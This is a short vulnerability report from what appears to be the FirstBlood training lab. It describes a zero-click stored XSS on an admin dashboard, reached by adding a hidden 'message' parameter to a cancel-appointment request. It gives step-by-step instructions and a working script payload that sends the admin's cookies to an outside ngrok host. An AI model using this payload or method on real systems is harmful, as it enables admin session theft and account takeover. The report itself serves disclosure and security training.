FirstBlood-#6740 click admin account takeover via stored xss on admin dashboard through cancel appointment.
This issue was discovered on FirstBlood v2.0.0 (issues patched)



On 2021-10-27, newrouge Level 3 reported:

Hey, i found that it is possible to exfiltrate admin cookies by planting a 0 click stored xss on admin dashboard through cancel appointment.

  • Looking back through cancelled appointments every user have left a message, for cancellation reason. But when we cancel there is no option to leave a message.
  • So , adding extra paramter mesaage= in cancel request will send the message to admin dashboard.
  • Now it is possible to execute xss through this message on admin dashboard, and steal admin cookies.
  • Input is reflected inside <a tag which can be easily escaped with "> and new HTML tags can be introduced easily.

Steps:

  1. Create an appointment and note down it's ID.

  2. Go to manage appointment and then click cancel appointment and intercept request.

  3. Modify request by adding message parameter with your payload to extract cookies.

  4. Send the request.

  5. Now as an admin go to /drpanel/cancelled.php to check cancelled appointment.

  6. You will be redirected to attacker's domain the moment you visit the page, without any click.

  7. Now attacker can login to admin account with this cookie.

Thank you

newrouge

P2 High

Endpoint: /drpanel/cancelled.php

Parameter: message=

Payload: hello"><script>document.location=`http://ca7f-45-118-159-250.ngrok.io/${document.cookie}`</script/x>


FirstBlood ID: 22
Vulnerability Type: Stored XSS

Whilst an attempt was made to fix the stored XSS vulnerability in managing an appointment, it actually introduced new issues such as when creating and editing and not just when cancelling the appointment. Making use of htmlentities() and relying on .value() in javascript to encode certain characters does not prevent XSS overall. The 'fix' to this issue also results in it being vulnerable to admins on cancelled appointments as well.